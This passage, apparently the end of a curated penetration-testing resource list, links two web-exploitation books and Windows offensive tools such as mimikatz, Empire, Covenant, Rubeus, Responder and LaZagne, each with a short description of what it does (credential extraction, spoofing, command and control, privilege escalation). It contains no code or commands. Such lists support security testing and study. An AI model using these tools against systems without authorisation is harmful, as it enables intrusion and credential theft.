### Web Exploitation Books
* [The Browser Hacker's Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Web Application Hacker's Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
## Windows Utilities
* [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - Graphical Active Directory trust relationship explorer.
* [Commando VM](https://github.com/fireeye/commando-vm) - Automated installation of over 140 Windows software packages for penetration testing and red teaming.
* [Covenant](https://github.com/cobbr/Covenant) - ASP.NET Core application that serves as a collaborative command and control platform for red teamers.
* [ctftool](https://github.com/taviso/ctftool) - Interactive Collaborative Translation Framework (CTF) exploration tool capable of launching cross-session edit session attacks.
* [DeathStar](https://github.com/byt3bl33d3r/DeathStar) - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
* [Empire](https://www.powershellempire.com/) - Pure PowerShell post-exploitation agent.
* [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel.
* [Inveigh](https://github.com/Kevin-Robertson/Inveigh) - Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/machine-in-the-middle tool.
* [LaZagne](https://github.com/AlessandroZ/LaZagne) - Credentials recovery project.
* [MailSniper](https://github.com/dafthack/MailSniper) - Modular tool for searching through email in a Microsoft Exchange environment, gathering the Global Address List from Outlook Web Access (OWA) and Exchange Web Services (EWS), and more.
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - PowerShell Post-Exploitation Framework.
* [RID_ENUM](https://github.com/trustedsec/ridenum) - Python script that can enumerate all users from a Windows Domain Controller and crack those user's passwords using brute-force.
* [Responder](https://github.com/SpiderLabs/Responder) - Link-Local Multicast Name Resolution (LLMNR), NBT-NS, and mDNS poisoner.
* [Rubeus](https://github.com/GhostPack/Rubeus) - Toolset for raw Kerberos interaction and abuses.
* [Ruler](https://github.com/sensepost/ruler) - Abuses client-side Outlook features to gain a remote shell on a Microsoft Exchange server.
* [SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt) - Retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.
* [Sysinternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) - The Sysinternals Troubleshooting Utilities.
* [Windows Credentials Editor](https://www.ampliasecurity.com/research/windows-credentials-editor/) - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
* [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target.
* [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows operating system.
* [redsnarf](https://github.com/nccgroup/redsnarf) - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
* [wePWNise](https://labs.mwrinfosecurity.com/tools/wepwnise/) - Generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.
* [WinPwn](https://github.com/SecureThisShit/WinPwn) - Internal penetration test script to perform local and domain reconnaissance, privilege escalation and exploitation.
## License
[![CC-BY](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/by.svg)](https://creativecommons.org/licenses/by/4.0/)
This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
|